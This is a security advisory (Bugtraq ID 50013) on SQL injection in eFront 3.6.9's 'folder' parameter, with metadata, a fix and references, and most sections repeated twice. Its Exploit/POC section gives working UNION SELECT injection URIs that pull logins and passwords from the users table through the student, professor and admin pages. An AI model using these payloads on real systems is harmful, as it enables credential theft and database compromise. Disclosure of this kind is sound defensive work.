eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
BID:50013
Info
eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 50013 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 07 2011 12:00AM |
| Updated: | Oct 07 2011 12:00AM |
| Credit: | IHTeam |
| Vulnerable: |
eFront eFront 3.6.9 |
| Not Vulnerable: |
eFront eFront 3.6.10 |
Discussion
eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eFront 3.6.9 is vulnerable; other versions may also be affected.
eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eFront 3.6.9 is vulnerable; other versions may also be affected.
Exploit / POC
eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available.
http://www/example.com/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
http://www/example.com/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
http://www/example.com/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
Attackers can use a browser to exploit these issues.
The following example URIs are available.
http://www/example.com/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
http://www/example.com/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
http://www/example.com/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
Solution / Fix
eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
eFront 'folder' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- EFront <= 3.6.9 Community Edition Multiple Vulnerabilities (IHTeam)
- eFront Homepage (eFront)
- v3.6.10 build 11944 (eFront )